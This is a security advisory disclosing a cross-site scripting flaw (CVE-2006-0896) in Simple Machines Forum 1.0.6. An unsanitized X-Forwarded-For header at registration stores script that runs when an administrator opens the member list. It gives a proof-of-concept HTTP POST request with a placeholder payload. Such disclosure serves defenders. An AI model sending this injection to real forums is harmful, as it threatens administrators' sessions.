X-Forwarded-For XSS in Simple Machines Forum - SMF
Summary
- Vulnerability
- X-Forwarded-For XSS in Simple Machines Forum - SMF
- Discovered
- 2006.02.24
- Last Update
- 2006.03.06 Exploitation code published
- ID
- EV0086
- CVE
- CVE-2006-0896
- Risk Level
- low
- Type
- Cross Site Scripting
- Status
- Unpatched. Vendor notyfied.
- Vendor
- n/a
- Vulnerable Software
- Simple Machines Forum - SMF (http://www.simplemachines.org/)
- Version
- 1.0.6
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Cross Site Scripting found in Simple Machines Forum - SMF (http://www.simplemachines.org/) script.
Vulnerable script: Sources/Register.php
Variable $_SERVER['HTTP_X_FORWARDED_FOR'] isn't properly sanitized. This can be used to post HTTP query with fake X-Forwarded-For value which may contain arbitrary html or script code. This code will be executed when administrator will open "View all members" section in Administrator's control panel .
Administrator's session is threatened.
PoC/Exploit
Example of HTTP POST Query:
- POST /smf/index.php?PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
- Host: [host]
- X-Forwarded-For: anyIP[XSS]
- Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
- Content-Length: 81
- user=m&email=m@m.com&passwrd1=m&passwrd2=m®agree=1®Submit=Register
Solution.
Solution for "X-Forwarded-For XSS in Simple Machines Forum - SMF" is not available. Check vendor's website for updates.